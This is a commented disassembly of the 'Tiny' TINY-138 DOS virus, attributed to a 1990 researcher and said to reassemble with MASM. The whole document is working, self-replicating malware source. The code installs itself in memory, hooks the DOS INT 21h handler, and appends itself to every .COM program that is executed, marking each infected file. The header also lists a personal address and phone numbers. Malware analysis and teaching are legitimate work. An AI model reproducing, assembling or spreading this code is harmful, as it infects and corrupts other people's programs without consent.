
  1. page ,132
  2. name TINY138
  3. title The 'Tiny' virus, version TINY-138
  4. .radix 16 ; Default radix is hexadecimal: bare numerals below (org 100, mov ax,4C00, int 21, mov cx,50, ...) are hex
  5. ; ╔══════════════════════════════════════════════════════════════════════════╗
  6. ; ║ Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51  ║
  7. ; ║ Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255         ║
  8. ; ║                                                                          ║
  9. ; ║ The 'Tiny' Virus, version TINY-138                                       ║
  10. ; ║ Disassembled by Vesselin Bontchev, September 1990                        ║
  11. ; ║                                                                          ║
  12. ; ║ Copyright (c) Vesselin Bontchev 1989, 1990                               ║
  13. ; ║                                                                          ║
  14. ; ║ This listing is only to be made available to virus researchers           ║
  15. ; ║ or software writers on a need-to-know basis.                             ║
  16. ; ╚══════════════════════════════════════════════════════════════════════════╝
  17. ; The disassembly has been tested by re-assembly using MASM 5.0.
  18. code segment
  19. assume cs:code, ds:code
  20. org 100 ; .COM image: execution starts at CS:0100h
  21. seg_60 equ 600 ; Linear address 600h == segment 60h; the resident copy is installed there (0050:0100h below)
  22. v_len equ v_end-first4 ; Size of the virus body in bytes (presumably the "138" in the name)
  23. start:
  24. jmp v_entry ; Jump to virus code
  25. db 'M' ; Virus signature (4th byte of an infected file; written by the stosb after the JMP operand in int_21)
  26. mov ax,4C00 ; Program terminate
  27. int 21
  28. ; The original first 4 bytes of the infected file:
  29. first4 db 0EBh, 2, 90, 90
  30. v_entry:
  31. mov si,0FF ; Initialize some registers
  32. mov di,offset start ; Put the address of program start in DI
  33. mov bx,int_21-first4+seg_60 ; Point BX at new INT 21h handler (its offset within segment 0 once the copy sits at 0000:0600h)
  34. ; The virus will be installed in memory at
  35. ; address 0050:0100h (i.e., at segment 60h):
  36. mov cx,50 ; CX = 50h, used both as the segment below and as the word count for rep movsw
  37. add si,[si+2] ; Determine the start address of the virus body (SI = 0FFh + JMP displacement = address of first4 in this copy)
  38. push di ; Now a Near RET instruction will run the program
  39. movsw ; Restore the original first 4 bytes
  40. movsw
  41. mov es,cx ; Point ES:DI at 0050:0100h
  42. cmpsb ; Check if the virus is present in memory (compares one byte of v_entry against the resident copy)
  43. jz run ; Just run the program if so
  44. ; Virus not in memory. Install it there:
  45. dec si ; Correct SI & DI to point at the start of
  46. dec di ; virus code and to destination address
  47. rep movsw ; Move the virus there (50h words from 0104h, so DI ends at 1A4h)
  48. mov es,cx ; ES := 0 (CX is 0 after rep movsw); ES now addresses the interrupt vector table
  49. ; Move the INT 21h handler to INT 69h and
  50. ; install int_21 as new INT 21h handler.
  51. ; By the way, now DI == 1A4h (i.e., 69h*4):
  52. xchg ax,bx ; Transfer INT 21h vector to INT 69h,
  53. xchg ax,cx ; preserving AX (CX = new handler offset, AX = 0 = new handler segment)
  54. lp:
  55. xchg ax,cx ; Get a word
  56. xchg ax,es:[di-(69-21)*4] ; Swap the two words (ES:[DI-120h] is the INT 21h slot of the vector table)
  57. stosw ; Save the word (into the INT 69h slot)
  58. jcxz lp ; Loop until done (two times)
  59. xchg ax,bx ; Restore AX (to keep programs such as DISKCOPY happy)
  60. run:
  61. push ds ; Restore ES
  62. pop es
  63. ret ; And exit (go to CS:100h)
  64. int_21: ; New INT 21h handler; runs with CS = 0 (the vector installed above is 0000:xxxx) and reacts only to EXEC
  65. cmp ax,4B00 ; EXEC function call?
  66. jne end_21 ; Exit if not
  67. push ax ; Save registers used
  68. push bx
  69. push dx
  70. push ds
  71. push es
  72. mov ax,3D02 ; Open the file for both reading and writing (DS:DX = path, as the EXEC caller passed it)
  73. call do_int21 ; Returns AX = 4060h, SI = open result, CX = 4, DI = 0
  74. jc end_exec ; Exit on error. NOTE(review): do_int21 ends with xor di,di, which clears CF, so this jc appears never to be taken
  75. cbw ; Zero AH (AL = 60h, so AX = 60h)
  76. cwd ; Zero DX
  77. mov bx,si ; Save handle in BX
  78. mov ds,ax ; Set DS and ES to 60h,
  79. mov es,ax ; the virus data segment
  80. mov ah,3F ; Read the first 4 bytes (CX = 4) into first4 at DS:DX = 0060:0000
  81. int 69
  82. ; Check whether the file is already infected or is an .EXE file.
  83. ; The former contains the character `M' in its 3rd byte and
  84. ; the latter contains it either in the 0th or in the 1st byte.
  85. mov al,'M' ; Look for `M' (scans the 4 bytes at ES:DI = 0060:0000)
  86. repne scasb
  87. jz close ; Exit if file not suitable for infection
  88. mov al,2 ; Seek to the end of file
  89. call lseek ; SI now contains the file size
  90. mov cl,v_len ; Length of virus body
  91. int 69 ; Append the virus to the file (AH is now 40h); the copy written carries the host's original 4 bytes in first4
  92. mov al,0E9 ; Near JMP opcode
  93. stosb ; Form the first instruction of the file
  94. inc si ; Add 1 to file size for the JMP
  95. xchg ax,si ; Move it in AX
  96. stosw ; Form the JMP's operand
  97. mov al,'M' ; Add a `M' character to mark the file
  98. stosb ; as infected
  99. xchg ax,dx ; Zero AX
  100. call lseek ; Seek to the beginning
  101. int 69 ; AH is 40h, write the JMP instruction
  102. close:
  103. mov ah,3E ; Close the file
  104. int 69
  105. end_exec:
  106. pop es ; Restore used registers
  107. pop ds
  108. pop dx
  109. pop bx
  110. pop ax
  111. ; Exit through the original INT 21h handler:
  112. end_21:
  113. jmp dword ptr cs:[69*4] ; Chain to the saved original vector in the INT 69h slot (CS = 0 here)
  114. lseek: ; In: AL = seek origin, BX = handle. Out: SI = low word of new position, DX = high word, plus do_int21's results
  115. mov ah,42 ; Seek operation
  116. cwd ; Zero DX
  117. do_int21: ; In: AX = DOS function. Out: SI = result of the call, CX = 4, AX = 4060h, DI = 0; flags come from xor di,di
  118. xor cx,cx ; External entry for Open
  119. int 69
  120. mov cl,4 ; 4 bytes will be read/written
  121. xchg ax,si ; Store AX in SI
  122. mov ax,4060 ; Prepare AH for Write
  123. xor di,di ; Zero DI
  124. ret ; Done
  125. v_end equ $ ; End of virus body
  126. code ends
  127. end start
  128.